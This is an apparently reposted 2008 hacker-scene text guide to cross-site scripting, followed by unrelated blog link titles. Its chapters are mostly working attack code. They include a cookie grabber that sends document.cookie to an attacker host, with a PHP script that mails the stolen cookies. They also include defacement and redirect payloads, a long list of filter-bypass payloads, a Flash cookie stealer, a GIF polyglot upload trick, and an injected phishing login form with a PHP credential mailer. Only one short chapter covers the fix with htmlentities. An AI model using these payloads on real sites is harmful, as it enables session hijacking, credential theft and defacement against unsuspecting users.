• Cross Site Scripting Attack and Defense guide


                                                                               ____
                                                                                 /   /
     ________________________________________________________________________/   /
    |                                                                       /   /
    |           Cross Site Scripting - Attack and Defense guide            /   /
    |_____________________________________________________________________/   /
                                                                         /   /
                                                 By Xylitol 10-02-08    /___/
    
    
    	Author: Xylitol
    
    	Description: a simple guide on XSS methods.
    
    	Homepage: http://xylitol.free.fr
    
    	Contact: Xylitol[at]fbi[dot]gov
    
    	Date: 10/02/08
    
    
    	Summary:
    		1>  What is XSS ?
    		2>  Code a XSS vulnerability
    		3>  Make a cookie grabber
    		4>  Securing XSS
    		5>  Deface Methods
    		6>  Filteration Bypassing
    		7>  Flash attak
    		8>  XSS upload
    		9>  phishing XSS
    
    
             ____                                   ____
            /   /                                   /   /
     ______/   /_____________________________________/   /______
    |     /   /                                       /   /     |
    |    /   /.:      Chapter 1 - What is XSS ?      :./   /    |
    |___/   /___________________________________________/   /___|
       /   /   (From Wikipedia, the free encyclopedia)   /   /
      /___/                                               /___/
    
    
    
    Cross-zone scripting is a browser exploit taking
    advantage of a vulnerability within a zone-based security solution.
    The attack allows content (scripts) in unprivileged zones
    to be executed with the permissions of a privileged zone - i.e.
    a privilege escalation within the client (web browser) executing the script.
    The vulnerability could be:
    
        * a web browser bug which under some conditions allows content (scripts)
    in one zone to be executed with the permissions of a higher privileged zone.
    
        * a web browser configuration error; unsafe sites listed in privileged zones.
    
        * a cross-site scripting vulnerability within a privileged zone
    
    A common attack scenario involves two steps.
    The first step is to use a Cross Zone Scripting vulnerability
    to get scripts executed within a privileged zone. To complete the attack,
    then perform malicious actions on the computer using insecure ActiveX components.
    
    This type of vulnerability has been exploited to silently install
    various malware (such as spyware, remote control software, worms and such)
    onto computers browsing a malicious web page.
    
                                            
    
    
             ____                                   ____
            /   /                                   /   /
     ______/   /_____________________________________/   /______
    |     /   /                                       /   /     |
    |    /   /.:Chapter 2 - Code a XSS vulnerability :./   /    |
    |___/   /___________________________________________/   /___|
       /   /                                             /   /
      /___/                                               /___/
    
    
    
    Open notepad and copy/past this script:
    
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    
    <style type="text/css">
    <!--
    body,td,th {
    	color: #FFFFFF;
    }
    body {
    	background-color: #000000;
    }
    -->
    </style><title>Simple XSS vulnerability by Xylitol</title>
    <body>
    <form action="XSS.php" method="post">
    <p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
    <div align="center">
      <table width="270" border="0">
        <tr>
          <td width="106"><strong>Search:</strong></td>
            <td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
          </tr>
      </table>
      <table width="268" border="0">
        <tr>
          <td width="262"><div align="center">
            <input name="submit" type="submit" value="     Search it !     " />
          </div></td>
          </tr>
      </table>
      </div>
    </form>
    </body>
    </html>
    
    
    
    
    after, save this page: index.html
    open a new notpad and Copy/past that:
    
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Search result:</title>
    <style type="text/css">
    <!--
    body,td,th {
    	color: #FFFFFF;
    }
    body {
    	background-color: #000000;
    }
    -->
    </style></head>
    <body>
    <span class="alerte">Search result  :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
    </body>
    </html>
    
    save this page in: XSS.php
    close notepad
    
    open index.html in firefox
    enter a value and search
    return on the page of research and enter  <script>alert('XSS')</script>
    send the form
    bingo a dialogue box !
    
     _______________________________________
    /  http://127.0.0.1 dit:              X /
    |________________________________________|
    |                                        |
    |                                        |
    |    ^                                   |
    |   / /                                  |
    |  / | /      XSS                        |
    | /  .  /                                |
    | -------                                |
    |                       ______           |
    |                      |  OK  |          |
    |                       ------           |
    |________________________________________|
                XSS Vulnerability is here...
    
    
    
    
    
             ____                                  ____
            /   /                                  /   /
     ______/   /____________________________________/   /______
    |     /   /                                      /   /     |
    |    /   /.: Chapter 3 - Make a cookie grabbers :./   /    |
    |___/   /__________________________________________/   /___|
       /   /                                            /   /
      /___/                                              /___/
    
    
    
    insert this script in a vulnerable page (for exemple a guestbook)
    
    <script>
    window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
    </script>
    
    
    (www.Hax0r.com = your site)
    Open notepad and make a page: cookie.php
    copy/past this code:
    
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Error</title>
    <style type="text/css">
    <!--
    body,td,th {
    	color: #FFFFFF;
    }
    body {
    	background-color: #000000;
    }
    -->
    </style></head>
    <? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?> 
    <body>
    <h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
    </body>
    </html>
    
    
    It is not enough any more but for the pirate,
    than to await the reception of the email and to read the cookie there.
    
    
    
             ____                                 ____
            /   /                                 /   /
     ______/   /___________________________________/   /______
    |     /   /                                     /   /     |
    |    /   /.:      Chapter 4 - Securing XSS     :./   /    |
    |___/   /_________________________________________/   /___|
       /   /                                           /   /
      /___/                                             /___/
    
    
    FIX it:
    for fix XSS Vulnerability use htmlentities:
    
    
    in line 16 Remplace:
    <body>
    <span class="alerte">Search result  :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
    </body>
    
    By:
    
    <body>
    <span class="alerte">Search result  :</span>&nbsp;<strong><?php
    if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>&nbsp;
    </body>
    
    
    use htmlspecialchars() function in PHP ;)
    
    other function:
    htmlentities() quotes
    strip_tags()
    ...
    
             ____                                 ____
            /   /                                 /   /
     ______/   /___________________________________/   /______
    |     /   /                                     /   /     |
    |    /   /.:     Chapter 5 -deface Methods     :./   /    |
    |___/   /_________________________________________/   /___|
       /   /                                           /   /
      /___/                                             /___/
    
    
    defacer with a XSS and a rather simple thing
    here are the principal ones…
    
    defacement by an image:
    <IMG SRC="http://hax0r.com/Haxored.png">
    
    or a video flash:
    <EMBED SRC="http://hax0r.com/Haxored.swf"
    
    
    more knew: the redirection:
    <script>window.open( "http://www.hax0r.com/Haxored.html" )</script>
    
    also see:
    <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
    
    
    
    
             ____                                 ____
            /   /                                 /   /
     ______/   /___________________________________/   /______
    |     /   /                                     /   /     |
    |    /   /.: Chapter 6 - Filteration Bypassing :./   /    |
    |___/   /_________________________________________/   /___|
       /   /                                           /   /
      /___/                                             /___/
    
    
    actually it's not that easy to bypass htmlspecialchars()
    here some other example of xss Bypass:
    
    <META HTTP-EQUIV=/"refresh/" CONTENT=/"0;
    URL=http://;URL=javascript:alert('XSS');/">
    
    <META HTTP-EQUIV=/"refresh/"
    CONTENT=/"0;url=javascript:alert('XSS');/">
    
    '">><marquee><h1>XSS</h1></marquee>
    
    '">><script>alert('XSS')</script>
    
    '>><marquee><h1>XSS</h1></marquee>
    
    "><script alert(String.fromCharCode(88,83,83))</script>
    
    <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    
    <div
    style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
    de(88,83,83));'))">
    
    window.alert("Xyli !");
    
    "/></a></><img src=1.gif onerror=alert(1)>
    
    [color=red' onmouseover="alert('xss')"]mouse over[/color]
    
    <body onLoad="alert('XSS');"
    
    <body onunload="javascript:alert('XSS');">
    
    [url=javascript:alert('XSS');]click me[/url]
    
    <script language="JavaScript">alert('XSS')</script>
    
    <img src="javascript:alert('XSS')">
    
    '); alert('XSS
    
    <font style='color:expression(alert(document.cookie))'>
    
    <IMG DYNSRC=/"javascript:alert('XSS')/">
    
    <IMG LOWSRC=/"javascript:alert('XSS')/">
    
    </textarea><script>alert(/xss/)</script>
    
    </title><script>alert(/xss/)</script>
    
    <script src=http://yoursite.com/your_files.js></script>
    
    "><script>alert(0)</script>
    
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    
    <IMG SRC=/"jav&#x0D;ascript:alert('XSS');/">
    
    <IMG SRC=/"jav&#x0A;ascript:alert('XSS');/">
    
    <IMG SRC=/"jav&#x09;ascript:alert('XSS');/">
    
    <marquee><script>alert('XSS')</script></marquee>
    
    <? echo('<scr)';
    echo('ipt>alert(/"XSS/")</script>'); ?>
    
    <IMG SRC=/"jav&#x0A;ascript:alert('XSS');/">
    
    <IMG SRC=/"jav&#x09;ascript:alert('XSS');/">
    
    <marquee><script>alert('XSS')</script></marquee>
    
    <style>@im/port'/ja/vasc/ript:alert(/"XSS/")';</style>
    
    <img src=foo.png onerror=alert(/xssed/) />
    
    <script>alert(String.fromCharCode(88,83,83))</script>
    
    <scr<script>ipt>alert('XSS');</scr</script>ipt>
    
    <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
    escape(document.cookie)</script>
    
    <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    
    <script>alert('XSS');</script>
    
    <script>alert(1);</script>
    
    
    Here and there is of it full with others
    google is your friends
             ____                                 ____
            /   /                                 /   /
     ______/   /___________________________________/   /______
    |     /   /                                     /   /     |
    |    /   /.:     Chapter 7 - Flash attack      :./   /    |
    |___/   /_________________________________________/   /___|
       /   /                                           /   /
      /___/                                             /___/
    
    Flash is used for complex animations, simulations,
    *creation of games etc..
    What’s interesting for us is the getURL() action.
    This function allows us to redirect the end user to another page.
    its syntax is built as follows:
    getURL(url:String, [window: String,[method:String]])
    exemple:
    getURL("http://victime.com/login.php?logout=true","_self");
    
    
    url: indicate the URL of the site
    window: specify within which framework the request must take place (_self, _blank…)
    method: method of request GET or POST (by defect GET)
    
    
    here the handling of the actionscript and the Javascript to post a alert:
    getURL("javascript:alert('XSS'");
    
    
    
    in 2002 one will show the danger of this facility,
    one could for example post the cookie of visitors in this manner:
    getURL("javascript:alert(document.cookie)")
    
    in December 2005, a new alternative and appeared
    consisting has to benefit from a nonpermanent fault XSS
    and possibility of putting a file flash in its signature to give a permanent XSS,
    moreover the author of this alternative used this technique in order
    to infect MySpace with a deviated worms xss of Samy: Samy Reloaded
    
    cookie stealer in flash ?
    not but there is technique to do it
    exemple
    in a flash file:
    GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");
    
    and in Haxored.js:
    document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;
    
    
    For secure it simple solution: do not allow flash files in your web app
    
    
             ____                                    ____
            /   /                                    /   /
     ______/   /______________________________________/   /______
    |     /   /                                        /   /     |
    |    /   /.:       Chapter 8 - XSS upload         :./   /    |
    |___/   /____________________________________________/   /___|
       /   /                                              /   /
      /___/                                                /___/
    
    Make Haxored.gif in paint for exemple
    after open Haxored.GIF in notepad
    delete all line and insert this:
    GIF89a<script>alert("XSS")</script>
    
    save and close it
    upload Haxored.gif in a free image hoster look your image
    and XSS is here...
    dont take Mozillia Firefox for look your image but Mozillia dont run your alert
    use Internet explorer
    
    Why add GIF89a ?
    well some upload like this one, check that the 'GIF89a' code
    is contained in the image as in any .GIF respective.
    the vulnerability of this upload results from the checking 'GIF89a' code
    for confirmation but of nothing the possible malicious codes contained in this image.
    GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>
    
    to know the code for another image format,
    it is just enough to open an image jpg or other with a text editor,
    for example a png file: ‰PNG
    
    PNG = ‰PNG
    GIF = GIF89a
    JPG = ÿØÿà JFIF
    BMP = BMFÖ
    
    
    For secure it dont check getimagesize() only
    
    
    
             ____                                    ____
            /   /                                    /   /
     ______/   /______________________________________/   /______
    |     /   /                                        /   /     |
    |    /   /.:       Chapter 9 - Phishing XSS       :./   /    |
    |___/   /____________________________________________/   /___|
       /   /                                              /   /
      /___/                                                /___/
    
    you understood the goal of the phishing ?
    and XSS ?
    
    in our example it will be necessary to find a Vulnerable site to the XSS
    and to inject there oneself in a form to oneself directly in the URL the following code:
    
    
    <p>Enter your login and password, thank:</p>
    <form action="http://hax0r.com/mail.php">
    <table><tr><td>Login:</td><td><input type=text length=20 name=login>
    </td></tr><tr><td>Password:</td><td>
    <input type=text length=20 name=password>
    </td></tr></table><input type=submit value=          OK          >
    </form>
    
    
    
    
    you will have it to guess script will simulate a form of connextion and send the value to you
    example of file php for  sending this email (mail.php):
    
    
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Error</title>
    <style type="text/css">
    <!--
    body,td,th {
    	color: #FFFFFF;
    }
    body {
    	background-color: #000000;
    }
    -->
    </style></head>
    <?php
    $login = $HTTP_GET_VARS["login"];
    $password = $HTTP_GET_VARS["password"];
    mail("email@example.com", "Cookie stealed ! - thx xyli :)", $password , $login );
    ?> 
    <body>
    <h2><strong>Error</strong> -<strong> Server too much busy</strong></h2>
    </body>
    </html>
    
    
    
    
    the user will believe that the waiter and overloads some and will not suspect nothing
    I think that you understood this principle ?
    
    
    
    
             ____                                    ____
            /   /                                    /   /
     ______/   /______________________________________/   /______
    |     /   /                                        /   /     |
    |    /   /.: Xylitol respects and hello's fly out :./   /    |
    |___/   /____________________________________________/   /___|
       /   /                                              /   /
      /___/                                                /___/
    
    nexus, Langy, Uber0n, FullFreeez, RePliKaN!, bl00d, c0de91, Xonzai
    Agent-D, Agent-Z, Vamp, Xspider, Mitnick, Honnox, Blwood, str0ke
    
    and all hardworking sceners in the scene !
    
     _________________________________
    |                                 |
    | .: Xylitol thanks this sites :. |
    |_________________________________|
    
    http://www.googlebig.com/
    http://xssed.com/
    http://www.xssing.com/
    http://www.milw0rm.com/
    http://H4cky0u.org/
    
    
    If you want to contact me for any stupid reason,
    drop me an MSN or WLM only: Xylitol[at]fbi[dot]gov
    ____
    /   / 
     /   /_____________________________________________________________________________
      /   /                                                                            |
       /   /             Cross Site Scripting - Attack and Defense guide               |
        /   /__________________________________________________________________________|
         /   / 
          /___/  By Xylitol 10-02-08
  • 相关阅读:
    Python随笔之字典Dict
    Python随笔之列表List
    Python基础整理,懒得分类了,大家对付看看吧
    shell批量推送公钥脚本
    Xcode 切换target 之后打包失败
    百度导航sdk错误日志
    前端项目中去掉替换双引号
    taro3.x项目中引用taro-ui以及taro-iconfont-cli
    taro
    JS中some() every() forEach() map() filter()的区别
  • 原文地址:https://www.cnblogs.com/yiwd/p/2886348.html
Copyright © 2020-2023  润新知